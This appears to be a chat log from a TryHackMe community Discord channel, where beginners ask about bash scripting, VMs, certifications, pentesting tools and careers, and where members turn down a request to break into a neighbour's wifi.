if you don't have a security foundation, i recommend you start by completing the pre-sec or cyber sec 101 roadmaps. they will give you the basis of cyber security concepts. the roadmaps contains practical tasks so you can experience ctfs with more guidance.
if you have a security foundation, you can go to the practice tab and sort ctfs by difficulty
Hi! I'm in Cybersecurity 101 in the cryptography lessons, and I'm trying to make a Caesar decipher script using the script knowledge from previous Linux lessons. This script gives me an error "command not found" on line 13. I'd like to add the "i" after calling the Rot function, to search for all the Rot variables I entered manually. Could you point me in the right direction for this command to call correctly?
`ciphertext=""
rot1="tr 'A-Z' 'B-ZA-B'"
rot2="tr 'A-Z' 'C-ZA-C'"
echo "What is your ciphertext?"
read ciphertext
for i in {1..25}; do
echo "$ciphertext" | $rot"$i"
done`
you can use python
that is really easy
i don't know python yet, I'm just trying to use bash script since I learned it in the previous course
`ciphertext=""
rot1="tr 'A-Z' 'B-ZA-B'"
rot2="tr 'A-Z' 'C-ZA-C'"
echo "What is your ciphertext?"
read ciphertext
for i in {1..25}; do
# escape the first $ so eval expands the variable named rot1, rot2, ...
eval "rot_command=\$rot$i"
echo "$ciphertext" | eval $rot_command
done`
CHAT GPT SAID "The error comes from how rot"$i" is being called. In your script, $rot"$i" doesn’t dynamically build the command as intended. To fix this, you can use an eval command to interpret the variable name and execute it as a command."
Oh, could you tell me what prompt you used to ask chatgpt for errors? I never used it for this
I just copied ur message
Lol makes sense
you can learn a lot from GPT
It shouldn't be relied upon as a source of truth, it can confidently say things that are wrong as truth.
I mean coding or etc
knowing what is wrong with my code
My response doesn't change, it can still be wrong even with code
but you cant deny that it helps
Creating memes such as glue on pizza? Sure
You're better off learning the "old fashioned way" at this point because you won't know when it's lying to you
Until you ask stupidly stupid questions
@tawdry dove You are a senior to me so i respect your point
But mistakes happen the old fashioned way also
Best to consult multiple sources, chat gpt, text books, forums.
for IT I have found GPT to get most of the answers correct the only thing that it struggles with in my experience is programming ( multi page programs or just slightly complex ) or any maths problem at undergraduate level.
Hi
Hello
Hey
yeah chat gpt cant do any applied calculus
I remember having to teach chat gpt more than learn from it
GPT is good if you try to learn the basics, but start doing something more complex and it is literally a rabbit hole! You will spend more time on repairing code than writing it 🤣 at least in my case
i found that gpt sometimes got the calculus questions correct mostly differentiation, but in proof questions involving a bunch of external lemmas and theorems it just shat the bucket and waffled for entire page.
Hopefully for C++ questions there will soon be a ChatGPT++ equivalent. 😉
am I the only one that has problems with kali on virtual box, randomly the network no longer works, for example I no longer can ping google
Works fine for me. Have you updated your Virtualbox recently? Also, VMware Workstation Pro is another option you can look at.
.
I actually have a separate question about kali
how do i get rid of the scroll bars on my vm for virtualbox?
Set the display to match your monitor in full screen, I feel VB is bad for that.
Hi guys, I'm trying to install dual boot windows and ubuntu 24.04.1 but it isn't detecting windows I can only erase the whole disk then install. I did some googling and I have turned off fast startup, made 100gb free space for ubuntu and disabled the secure boot but it still isn't giving the option for dual boot. I could really use some help with it since I'm new to ubuntu.
I'd strongly recommend not mixing windows with linux
If you absolutely need both, use wsl2
If you need a hacking box, use a vm
Why not?
Adding two OS's is just adding the opportunity for errors. If you use windows more than linux i'd advise installing windows and then running Linux VM's and vice versa if you use linux more than windows.
Well thanks for your advice I'll try out the VM first then
Also windows generally doesn't seem to like dual booting
In my case, I've configured dual boot a long time ago with separate partitions for both systems and grub loader. And still successfully using it for 3 years
I assume you didn't configure grub if you didn't mention it in your message. So if you decide to try again, try to look into it
This is correct, it doesn't like having things on the same drive at a minimum. It will overwrite your grub and or boot partitions
I'm new to it so it seemed like the best option to try it out since I saw it automatically installs grub for dual boot and you can make the partition for it when installing it but when I get to the how do you want to install it there isn't an option for windows like it doesn't even detect it just to erase the whole disk and install on it what I don't want to do without trying it out and getting more familiar with it
After connecting the software .ovpn to Kali via the configuration file using the openvpn /path command.ovpn remains enabled
2024-11-10 04:28:28 Initialization Sequence Completed
2024-11-10 04:28:28 Data Channel: cipher 'AES-256-CBC', auth 'SHA512', peer-id: 9, compression: 'stub'
2024-11-10 04:28:28 Timers: ping 5, ping-restart 120
. At the same time, if ping is enabled, it sends 4-5 packets, then stops.
If you're asking for help with the THM VPN, #site-support
I'm thinking about replacing windows 10 with ubuntu but I'm seeing these posts that it's got a lot of bugs. Is anyone using the newest version of ubuntu? If yes what has your experience with it been like?
Ubuntu probably has less annoying bugs than Windows tbf.
Depends on your system. If you have a new laptop, especially a nice one, I’d do Pop_os instead of Ubuntu. Anything else do Ubuntu
There’s a reason servers operate on Linux
You can just use a VM if you want to try it out
Aside from the majority of Windows Servers you mean.
I'm talking in orgs, Windows Server dominates the OS use list.
It may not be 71% now, like it was in 2019, but it won't be too far off.
How did you reset the password?
Most of the backbone of internet runs on Linux, Also Azure runs on Linux 😂
I have never used Pop_os, but I heard good thing about it
It’s great for newer laptops, cause it automatically does the gpu kernel configuring
Little bit of bloatware, but I’ve used like 80 percent of it anyways
man i bought a lenovo T440 to run specifically linux, but i don't have a use case for using it at all for now 💀. I have ipad for entertainment and my rig for gaming / HTB training.
I'm a big fan of Fedora
Hello, I am a weak person and I am still being treated for my addiction to games and pornography. Is it possible for someone to suggest some good hobbies for me to do in my life in addition to studying? Sorry for this embarrassing question, but my life is empty and I want to learn hacking so that I can protect people from the harm of pornography and games.
sorry
Welcome 🙂
Are you new to cyber security and not sure where to start? This pathway will help you acquire the core skills required to start your cyber security journey.
You can start here
First start with pre-security path where you will learn the networking basics, which help you to get out of pornography
Start to think how the specific thing work then you don't have a time to think about porn again 🙂
Will there be a discount on annual subscription
Probably around black Friday/December
I say probably, I'm not staff, I won't/don't know for certain
*not staff
Lol
Never give up friend! Just be sure not to trade one addiction for another.
Good catch.
I've not had any confirmation yet on my job application.
Thank you all for your support and motivation. I thought I would be neglected and no one would care about me. Thank you very much.
Hello friends, I am an Arab and I want to learn English in addition to networks and hacking. Do you know a good source for learning the language from scratch? Oh, and another question: Is the CompTIA course good for me to start with since it is free on the Professor Messer website? Should I start with it or not?
Oh also I am speaking from Google Translate now
CompTIA exam preparation is good. The exams are geared towards professionals (and priced accordingly), but they're apparently worth it if you're looking at getting a job in this field
You start learning language with Duolingo , it can be a great starting point 🙂 . Check out this THM resource if you're interested in Comptia Pentest+ certificate 🙂 .
CompTIA PenTest+ is for cybersecurity professionals tasked with penetration testing and vulnerability management. Use this pathway as supporting content and pre-preparation for the CompTIA certification exam. Upon completing this pathway get 10% off the exam.
guys when you're all sleepy and there's apathy, how do you regain motivation
That guy seems to have a good grip on English.
I understand about a dozen languages but my speaking skills... oh boy. Should start working on that too
Rest and have other hobbies, getting yourself to exhaustion does more harm than good
thank you! you're right
You need discipline not motivation bro 😄
anyone who wants to grind tryhackme with me as a friend?
hahah that's true some days too!
Hi
Deal
i already do but sure!
any golang enjoyers? i'm learning it for my job rn
anyone who has done the junior pentester path on thm? what other things should I do to complement it?
I was doing but my subscription was over
what are you doing now?
Hii everyone I want to play CTF challenge on integrity can anyone join me I need a team mate
I am waiting for december
Bug bounty
what are the prerequisites of bug bounty hunting?
After it , you can move on to red teaming pathway 😄
Nothing more just some language basic for understanding code and mechanism of website how its work
lol what about practising the stuff they teach like enumeration and stuff
You can do some CTFs to practice that 🙂
Yaa right
guys do you ever feel incredibly dumb
while doing labs
also, do you remember all the commands you ever need? I look everything up each time. My friend who works in cybersec essentially does the same
is there a way to train yourself to not forget anything
Take notes, and use them.
Yep, create your cheatsheet and use it
My Kali installation started having DNS problems. After a few minutes of use, the internet randomly stops working.
is a bug from the last update of kali or is mine
check their website, forums and kali discord server, those are the best places for that question.
Yeahhhh
@forest igloo Are you running it in a VM?
Check your dns configuration
"cat /etc/resolv.conf" may look something like this
"nameserver 8.8.8.8
nameserver 8.8.4.4" if not, you can manually change this: "sudo nano /etc/resolv.conf" and add dns lines into it
yes
This may be caused by the network connection in your VM settings. If the connection settings are good then try to refer to the dns configuration of your machine. If the issue isn't solved tell us, we will help you
Where are you from, brother?
@south inlet
@radiant jacinth and @radiant jacinth
English only please.
Shut up
OK sorry guys
Egypt too
I sent you a friend request
telling @south inlet to shut up is more than likely not helpful ^^
:mute: oalotfy#0 has been muted.
Sorry on his behalf
Don't be sorry for them, I asked nicely and you stopped and spoke English.
We appreciate that.
Thanks
What are the prerequisites for bug bounty hunting??
Well , you need to be familiar with web vulnerabilities 🙂
Hello, I want to ask something, I don't have a university diploma, is there any possibility of finding a job in this field other than reference by getting a certificate?
not just a certification, but experience too
Is thm enough for that?
It's a good starting point 😄
Hello, my brother. I found a doctor in information security and hacking. He says that there are jobs for experience only, but for a certain level, and after that, he will need certificates. Therefore, I tell you, learn for free, get experience, and after that, think about certificates.
Good morning, my brothers
University certification or the others?
Can you tell me the exact thm module?
Check out this 😄
This is also a channel on Discord dedicated to bug bounty
University certificates can be replaced, for example, with a CompTIA course, but the most important thing is certificates outside the university from companies such as network cisco, ethical hacking, etc.
Do you get me? When I get home, I will send you a hacking or cybersecurity plan, certificates, and you choose which certificates you want.
Thank you,sir.
Sorry ,what this
hi
Hi, welcome 😄
Hi KGB is it okay if i send a friend request?
Feel free bro 😄
Alr thanks man, good to ask before i do
sorry, i was really excited to talk to a friend from my country. Won't happen again.
@errant nova are you active on HTB?
which channel ??
This one 😄
This channel isn't dedicated to bug bounty, #bug-bounty is 😅
Does anyone here have experience with implementing an ISMS?
I got myself into a new, nice position as an information-security-advisor and I inherited an ISMS that my company wished to implement but forgot about for years.
So I have a 20% finished, 3000 points long checklist which needs to be reworked (cause it is REALLY out of date). Does anyone have pointers or advice? I already use government advisory documents and CIS Benchmarks, but is there anything else you would advise me to do?
Depending on the ISMS read up on which foundation it is set on. E. g. ISO 27001
They are not aiming for any certification or have any foundation - which is what makes this thing so confusing
But Thank you!
No need to certify.
here
Hi friends
Anyone know the answer for this
To whom did you escalate the event associated with the malicious IP address?
Pls help me
I tried several times using Junior Security Analyst, Security Analyst, Security operation center
All wrong
Is this TryHackMe content? If so, #room-help is the best place to receive assistance
Is it still working, guys
isnt it illegal
He said he reported it
He found a bug and reported.. So i think its not illegal
asking people to abuse this
I think whatsapp already fixed this
As it was reported months ago...
Don't work on my phone 🫡 , no my whatsapp privacy is safe
is there a way to connect through my whatsapp account without a phone ?
I don't think so
You have an app on desktop , but you need to login 1 time with phone
yeah i dont think you can access without your phone if you have never logged in to whatsapp web
is windows fundamentals necessary for pentesting?
Yes , they're 😄
i mean think about it companies, offices, hospitals use windows it is the "dominant OS" and the most targeted because of this reason so yeah its necessary (my opinion tho)
finished london bridge today - out of my depth with some of it, need to work on my fuzzing discipline big time, but at least i did the last bit all on my own
Maybe a question for the ones who are pentesters. What do you prefer: to use with nmap -sT or -sS? Tested the sS on my system with wireshark and it still caught the ip address so the „stealth“ option doesn’t make any sense to me or does it?
It was “stealthy” a long time ago, now its picked up by modern systems.
For pentesting, you rly wouldn’t use nmap unless there’s specific reason to do so. You would usually use a tool like Nessus which the IP is whitelisted by the client and aggregate the findings from it to find exploitable vulnerabilities.
Do you guys get the feeling where you forgot most of the stuff and even the what you have learned when you get the motivation!!
Hmm? I will strongly disagree, if Nessus is the only software used for reconnaissance/port scanning then that is not a pentest, but a vulnerability scan. You can miss a lot of vulns this way.
Nessus is a great tool, but as an addition to other means of enumeration. nmap/masscan or a similar port scanner should still be utilised if you are working on a real project
Added the Nessus Room to my to-do list.
Well my question is because i don't have "real life" experience with those tools on a real project and im just learning right now here. Until i finish the Red Teaming Path and try to get some customers to try it out in the "real world".
What could be a specific reason in your opinion?
If you don't really have real world experience I'd suggest starting with some kind of employment or mentorship, as doing freelancing as a pentester while you are still new is not the greatest idea
I agree that you shouldn’t only use Nessus when doing pentest. I also said that you wouldn’t use nmap unless there’s a specific reason to do so. The only reason I’m bringing up Nessus (or other tools for that matter) is that they have a vulnerability database that can easily be mapped to find vulnerabilities unlike nmap and masscan in which you have to turn on different options for. They also have a UI which is easily readable, mappable, and are able to generate report/data that can be plugged in to other reports.
Pentesting is time-limited. You need to cover a lot of ground (depending on the scope) and thats why you use tools like Nessus to help make it easier.
Well, still that would not be the best methodology to recommend, especially to pentesters that are new to the industry. Nessus (or other vuln scanners) generates a lot of false positives and it can make the pentest less efficient. Most of the enumeration should still be manual, and actually in many scenarios you will not be able to utilize vuln scanners.
Yes, they do, I believe this is why I said you are to aggregate the findings and find exploitable vulnerabilities. Manual enumeration is always good but in a pentest where it is almost always time-limited, you won’t be able to check every nook and cranny.
I agree there are scenarios where vuln scanners can’t be used but it should be in the interest of the client for vuln scanners to be used so as to make the most out of their time and budget.
But as always, it depends on the scope.
In that case the client should be informed that due to the time/budget/resource limitations, the tests will be based on automatic scanners. The sales team should work with the pentesters to avoid any miscommunication
I've worked with networks that consisted of tens/hundreds of thousands of hosts and still, the tests were not based on vuln scanners, these were just used as a point of reference and help for catching the low hanging fruit
You’re missing my point. I’m not saying automatic scanners are what you should use instead of other tools or manual enumeration.
This is exactly what I mean.
Well so what did you mean by 'For pentesting, you rly wouldn’t use nmap unless there’s specific reason to do so.'?
That's quite misleading
I’m not sure how it can be misleading. You can definitely use nmap and other tools for enumeration but my point is vuln scanners like Nessus exist for a reason. You use data from it to find exploitable vulnerabilities. This is where you mention low-hanging fruits but of course you aren’t limited to that. One example is these scanners also do port scans. Data found from that can be confirmed with nmap for example.
Can anyone help me I don't know the password to my neighbour's wifi I want to use it
@south inlet
what?
That is super illegal...
Sorry I didn't know, I just wanted to use it for study purposes
Doesn't make it legal, you can ask them?
Can anyone tell me what I can use this server for
no bro He is a very angry person
Just checked Nessus Professional and the expert option
Vulnerability scoring with CVSS v4, EPSS and VPR (for Top 10 Vulns)
That's quite limiting on purpose in my opinion (both options have that for the Top 10 Vulns)
I will def. consider Nessus as a tool with nmap
BUT not for now
because of the price.
Buy Nessus Expert
Select your license
Buy a multi-year license and save more.
1 Year - €6,343.29
Not in my budget 
So it would be a good decision to write something in python to check the exploit database with what i have found with nmap to automate that part
Nessus pro is for orgs
It's used to partner the website https://www.tryhackme.com to learn ethical and legal Cyber Security.
Maybe another logical question because for this im not sure. For Example i have the permission from company X to run a test on them and they have their webhosting on company Y.
They are fine so far but for example i find a vuln on their database they use because of their webhosting service from company Y - they didn't update it.
First - should the webhosting company Y be also informed that a scan will happen?
Second - the problem is at the company Y because they didn't update their database.
The report is ofc going to company X but I should also get in touch with the webhosting company Y for that and maybe make some extra $ ?
This is all hypothetical just had that in my mind since many companies use a hosting service.
Company Y should be asked for permission first.
As it's their services and potentially their hardware etc
That's when you would request a Letter of Authority.
Basically tell company X to get written permission from company Y allowing you to test the service which they provide to company X.
pretty much good night so far , you?
good evening everyone
Good evening to you too 😄
What are you up to?
Hi, I have a question. I am doing the Pre Security and I don't know if my study method is good. It is really helpful to resume the courses on a document? Because I have the feeling that I am losing a lot of time. I am kinda stressed when I don't know exactly something but when I spend 2 hours on a section that TryHackMe tells me will take 30 minutes, I feel like a failure. Sorry for the mistakes, I am also learning English
Hi 😄 . Don't worry about that "time" , this is more like a gimmick 😄 . Take as much time as you need , don't speedrun 😄 .
Just chilling today 🙂
hey guys...im new here....i have a question....you know those scenarios where you the examiners give you values of RGB and then you gotta answer whats gonna be the value....how do I solve those?
The time estimations THM provides are estimates, not requirements. If you want to take your time and read the prompts, take notes and really understand what you’re doing, you’re welcome to do that. You should learn how you learn best
Ok thank you for your help!
windows fundamentals are so boring anyone who feel that type of way?
That's a part of learning 😄
what if I forget the info after learning it?
You need to practice often to "burn" that into your memory 😄
how to practice windows fundamentals?
Thm has 3 rooms on Windows Fundamentals
yes
after completing the foundation rooms, you can practice by doing CTFs on windows machines
Also try dynamic malware analysis on windows. It will help
Typically don't have malicious intent, but may break into systems without permission to find vulnerabilities. They may then report their findings to the system's owners, or expose the exploit publicly if the owners don't respond. 
ty
Which is illegal
There's no such thing in the eyes of the law.
?
Every action in your message is illegal. The point I'm trying to get across is that there is no grey, you're either within the law or you're not.
Then how do bug bounties exist? 👀
If you reread their message, they're clearly not talking about bug bounties. Bug bounties are defined programs, not someone hacking in willy nilly
Oh, yeah, fair. Thanks for pointing it out.
is there gonna be a black friday coupon/sale this year?
Follow THM social media , maybe something interesting will pop-up 😄
What @tawdry dove was trying to point out is that there has to be permission from an authorised personnel or in the case of bug bounties, clearly defined scope.
Suggest reading up on the terms or guidelines followed by Google's ZDI as well.
Yea but sometimes people may go out of scope to gain extra rewards 
They run the risk of being persecuted then, as it is illegal and is strongly discouraged.
Shhhh
Or more to the point, prosecuted...
The "reward" for that is generally prison.
Do not go out of scope. It doesn't make you cool, or edgy. It's not a "calculated risk to gain more rewards".
All it does is prove that you are a bad representative of our industry. It gives all legitimate hackers and bounty hunters a bad name. The scope is a contract between you, the bounty platform, and the target. Choosing to ignore that makes you unethical.
Yea I agree 
... Then why are you suggesting it.
.
Your emoji choice there also contradicts your words more than a little 

As Moose said, there's nothing "grey" about this. It's illegal and unethical, pure and simple 🤷‍♂️
I completely agree that people should never go out of scope. However, I wasn't implying that they are on the good side; I was merely defining what they are doing. 
Ah, then you might wanna avoid putting a "hackerman" emoji at the end of your point. It kinda implies otherwise 😆
Ok 
Oh.. thanks for the correction. Must be the manhwa I'm reading. 🤣
Gave +1 Rep to @quaint basin (current: #9 - 801)
hlo
Hello!
I was thinking on getting raspberry pi, because I heard that you can make some nice hacking and networking projects with it. Does anyone recommend getting it? I just want to know if this is truly worth it
Sure , why not 🙂 .
i think they are fun to play around with and cheap enough that you can easily make them "worth it"
I personally like esp32’s they are cheaper 🙂 lots of projects out there too. Look into the marauder
👏🏽
Yeah me too. To add onto this I was thinking of a “flipper zero”. The RFID side of town.
Any SBC is a 'good' platform to learn from; what makes rpi in particular attractive is that there is a large amount of hats and boards you can easily connect. It doesn't really do anything that you can't do with, say, an arduino leonardo, but it does it in a way that might be more accessible depending on your comfort level with hardware and prototyping.
Alrighty I will take all of your answers to heart
Thank you!
Sure
Sent
Hi
Dear friends i'm new here✌️
Welcome dear friend 😄
Hi!
Same here
Funny enough I just bought one
Welcome 😄
Thanks
Gave +1 Rep to @weary meteor (current: #16 - 510)
Hi!
Hello
How's you?
Hi
Hey @dusty meteor, welcome to the Community 
Hi everyone, it is really great to be here. Studying alone is terrifying 😬😁
I am a complete beginner and just joined the community. I have enrolled in pre security path and done the first task, which asks to solve a question. However, the second task asks me to hack my first website, connecting to a VM. I find it confusing. Can anyone, who realized what I am talking about, suggest me a solution? I mean I maybe need to first learn sth, but idk what 🤔
I will be glad if you help, or please let me know if here isn't the right place to ask this question.
Thanks
What causes the problem 🙂 ?
Oh it is solved now, thanks for asking.
I thought I had to hack without any instruction, but fortunately, I found the guidelines.😁
It is so fun 🥲
Gave +1 Rep to @weary meteor (current: #16 - 512)
If you ever need any help , feel free to send the message here https://discord.com/channels/521382216299839518/522158539129618453 🙂
i have a question for yall , anyone ever did the OrangeHRM on owasp / dvwa ?
I appreciate it. Thank you
Gave +1 Rep to @weary meteor (current: #16 - 528)
As a security analyst, how would you answer a tell me about a time you worked on a team task question ? What example or answer would the HM be looking for ?
You'll need to tell them about a time you've worked in a team. We can't really answer that for you as your personal experience is different than everyone else.
Hello guys, I need to install Linux as a virtual system on an Android 13 RAM 3 mobile. Can someone help me?
This question validates collaboration and problem solving, so focus on that in your answer.
yes go on i will help.
but i will suggest to install linux like kali linux on a bootable live usb. it would be more useful
Does anyone here use FortiSIEM and have their own SOAR setup? Specifically I'm interested in whether I can have FortiSIEM communicate towards an external platform and send information, the documentation I can find is centered around inbound data rather than outbound.
How do I do that?
Good luck. We included fortisiem in a bakeoff to select a new SIEM last year, and were severely disappointed with it in comparison to all other competitors in the space.
If your network isn't already forti-everything, it's trash.
Hello. I want to start learning CTF and keeping my foot in the competitions around. I need someone to mentor me in this regard
THM makes learning so easy that you basically don't need a mentor to be honest with ya
Alright so where can I find the CTF resources in THM? I have completed the offensive security tho
hey to everyone ,can i ask you about how can i get or find a voucher coupons ?
Pretty sure its only the Black Friday Deal and student discounts. No public vouchers
If you can get proof of school and you do a yearly sub with the BLACKFRIDAY2024 code it comes to about 22 cents a day for a year
Try with this guided CTF 🙂
Thank you Comrade!
Gave +1 Rep to @weary meteor (current: #15 - 551)
Cool profile picture btw 🙂 . Aiden Pearce 😄
😄
@south inlet
Done!
hi
Hi everyone
Welcome 😄
welcome
How are the ReCapMe's calculated? It said my longest streak was 52 days this year but my current streak is over 1000
I would assume ongoing streaks are not included
nice streak
Yes but my point is I've obviously had a streak going all year, which has more than 52 days
Hello everyone! I was going to ask if there is a glitch with the ReCapMe, because it says my learning time is 12,960 minutes, but I have recently started using TryHackMe?
This is just 9 days but expressed in minutes
Oh, thanks. Sorry for the dumb question!
Gave +1 Rep to @brisk folio (current: #1573 - 2)
It wasn't a dumb question at all, I was expecting a more accurate minute count for my activity as well (as opposed to my streak expressed in minutes 😂) No worries!
Yeah, the streak is something else 😁 . My friend has a problem with it too.
So, cisco is a monopoly?
No
doesn't it embrace like 90% of the market?
Did you conduct a search of their market share utilizing your favorite search engine?
90% would be so impressive
From a very brief search I would probably say 60% is around what they do embrace
what is this rep thing?
its like a workout or smthng? lmao
it stands for reputation... you get one for every time someone sends a message thanking you with pings or mentions
What's the purpose of this channel?
It's a place for people to chill and have a conversation if #general flows too fast, it can sometimes get a bit hectic with multiple conversations flying at once.
Gotcha, thnx. In that case I'll post my message here as it got ignored successfully in #general
Hello everyone, i am new and have zero knowledge in the field of cybersecurity so how to get started with THM?, i have the subscription and Kali Installed as dual boot in my system that's it
You can start with this pathway , it's very beginner friendly 😄
Are you new to cyber security and not sure where to start? This pathway will help you acquire the core skills required to start your cyber security journey.
Thnx mate
👀
this path keeps hanging. website take too much time in loading, and kscreen freezes.
..
where I can find machines with SCADA
I want to learn more and I don't find machines to pentest
SCADA is more commonly found in ICS
^which you should not attack lol
Hallo
I am also new join 😄
Cybersecurity is awesome. Good job starting.
As technology advances further, exponentially the importance for securing it also raises.
uh ... ur in the THM server? Is that a real question, and if so, what is ur lvl of exp now?
I started with web dev, got amazingly frustrated with how this industry works and wanted to break everything, and boom!! there was THM to help me learn ... so ... here I am now, a total beginner, but well on my way to understanding things I never did before.
ok
Hello everyone, If anyone has an extra TryHackMe voucher they are not planning to use, I would be truly grateful if you could kindly share it with me. Your generosity would be greatly appreciated.🥹
Thank you so much for considering my request.
How long have you been on THM , how long is your streak 🙂 ?
9 streaks
How long are you on THM 🙂 ?
1 year approx or I think more than that...
But this time I genuinely want to stay consistent because it's about for my career now. I am a fresher and need to clear my concepts and practical learning. And without these, I will not get the job.
Which area of cyber security are you most interested in ?
My specialization is in Information Security. So, I am more focused on that side. But tryhackme is giving me so many other areas where I can get great skills. Like Penetration testing... and many more. I really want to discover my best self.
Could you send a link of your THM profile 🙂 ?
I have a voucher from Cyber 101 , I can give it to you but you need to promise me that you will be practicing every day in December and that you will stay consistent 🙂
I promise you, I will stay consistent for sure. I will not disappoint you .
Sent you a DM 🙂 . I will check up on you 😄
Remember to practice every day 🙂 .
I would be really really grateful to you.... I truly appreciate your kindness and support.Thank you so much
And don't miss Advent of Cyber it's meant for beginners starting their careers
Okay..:)))
Happy hacking 🙂
Thank you once again.😊
Gave +1 Rep to @weary meteor (current: #12 - 618)
Also verify to link your discord and THM profile 😄
The TryHackMe Discord Server
I have already verified. Thank you
On site 🙂 . You also need to verify on Discord 🙂
oh okay.
The TryHackMe Discord Server
Done.🙂
Now you're fully verified . Happy hacking 😄
Thanks!!😄
In web hacking, can I use my programming knowledge specifically to hack? Like maybe looking at a codebase and see an exploitable flaw or does it mostly rely on using tools like Metasploit and Burp?
You gotta know how to analyze web application's source code or APIs, this will remove flaws like injection points, also basic knowledge for writing custom scripts or exploits that are tailored for some vulnerabilities such as creating payloads for SQL injection is important
Burpsuite and metasploit won't be so effective if you don't understand application's logic
so understanding how the web app is working is important for hacking it. What about creating a custom exploit to a target a website (in python for example), how prevalent is this type of programming in the web hacking world?
People will use python to exploit vulnerabilities in web frameworks (joomla, wordpress) or they might want to target applications that are built with PHP, that's why Requests and Urllib are so important for crafting HTTP request, while some other libraries are more used for packet manipulation
Or if someone wants to simulate attack, test defense, implement security measures, etc...
That's cool. I was worried that web hacking was just using tools. Glad it has programming as part of it
Programming is actually what elevates web hacking and lets you innovate it, that's how you learn how to craft custom exploits sets, or detect some vulnerabilities
Thank you for your time 🙏
Gave +1 Rep to @nova tree (current: #225 - 29)
I had a question. I have never done a CV but is it possible that I can add any TryHackMe stuffs in my resume? I am interested in cybersec stuffs so
You can put it in a hobby section 🙂
Fair. I wish I could show my employer that I learnt stuffs from here. It's just my university doesn't teach me anything relevant to it
there's nothing stopping you from showcasing it in your appraisals or 1 to 1, or drop it like oh I found this out from this learning platform etc. there's plenty of ways you can highlight your skills, even writing something about it every now and again does have an impact ~
Thank you, will think about it
It also shows that you have the initiative to learn using available resources on your own, by your own decision rather than “school made me do this”. I think there’s value there also
Hello everyone. I'm a newb just looking for a positive environment to learn. Currently work in a help desk role and I'll be starting a B.S. Degree in Cyber Security Tech. @ UMGC in January. Looking forward to being an active member! ☮️ 🩷 🤘
same...im doing the degree(final year 2025) but would love sum help desk exp. for the time being, any advice?
Welcome 😄 
Yes, can write about that too. That's a great perspective
good to see you've been actually practicing
most people just make an account, do 4 or 5 rooms then give up
welcome dude
hey everyone , hope all doing great
need a little help , i am learning airmon ng and for this i need wifi adaptor .. i have normal wireless wifi in my house and is connected to my laptop isnt showing WLAN option when i do sudo ifconfig in my linux .. can anybody tell its bcs i am not using wifi which is connected by wire with my laptop or some other reason ?
i am using VM right now
Wifi hacking is restricted to the advanced channels
Sorry didn't know about this .. deleting it
Has anyone tried doing Advent of Cyber '24 Side Quest?
Ask here https://discord.com/channels/521382216299839518/1312113121040535656 😄 , they are 🙂 .
Thanks
hi
Hi!
Anyone been in the field for a while and open to me bouncing some certification questions off of them? 😅 would be very much appreciated
All, you can definitely get an entry level help desk job with no prior experience. Companies want to see that you have customer service skills and that you’re trainable.
If a role says they require a degree, apply anyways. You need to sell yourself.
That’s how I started, no prior experience with an internship. Was hired on full time as a tier 1. Moved from the help desk to an onsite technician for device installs. Switched companies and moved into a tier 2 role that I’m currently working now. Picked up a couple small Microsoft certifications along the way but nothing major. Now I want to get away from this side of the industry and move toward something security related. I have a lot of ground to cover, and would like to start working towards certification to focus my studies on a specific goal that will also help with transitioning into a security role.
Sysadmin or networking. You usually cant just jump into cyber.
I’ve heard that a few times. My current job allows me to dip my toes in the pond with different teams. Ideally I’d like to get some hands on networking experience at my current job, but I can’t do that unless I’m hired as a full employee, currently under contract
I could get my A+ relatively easy after a week or two of touch up on my studies, but that feels like a waste as I really don’t want to be in my current role any longer than necessary. I thought about grabbing the network + instead and following up with the security +, but haven’t really made a move in either direction.
Wow 😲 another successful business day
, Glad am making things happen it's really not easy but my determination to get started keeps me going and am glad I did, now my store has been nothing but success. To those that wish to make this happen get started now , take action be responsible for your actions stop doubting yourself that's how successful grow. Be part of the 1% who are making things happening and stop following the 99% who are giving excuse for their failure. New week, new successful unlock 🔓
hello everyone im a college student majoring in cybersecurity and am trying to get a entry level job but don't know where to start any pointer ?
Dice and leethub, LinkedIn- US
thank you
Gave +1 Rep to @candid swan (current: #1587 - 2)
Certainly Welcome!
and you put it on linked in. and do a write up.
Because you're using vm and ur virtual machine doesn’t have a WiFi adapter
Oh I guess that question was a long time ago lol nvm
Was there any clues on side quest on Day 2 ?
Take a look at job board maybe you'll find something 🙂
in case you didn't receive any answer by now, you might need a special network interface controller to properly use airmon-ng. luckily the room for wifi hacking uses a wireshark capture pcap to answer but if you're testing on a live network with wireshark you might need a NIC with packet injection or at least monitor mode available which most built ins for laptops don't have. you're going to have to cough up 100 bucks or so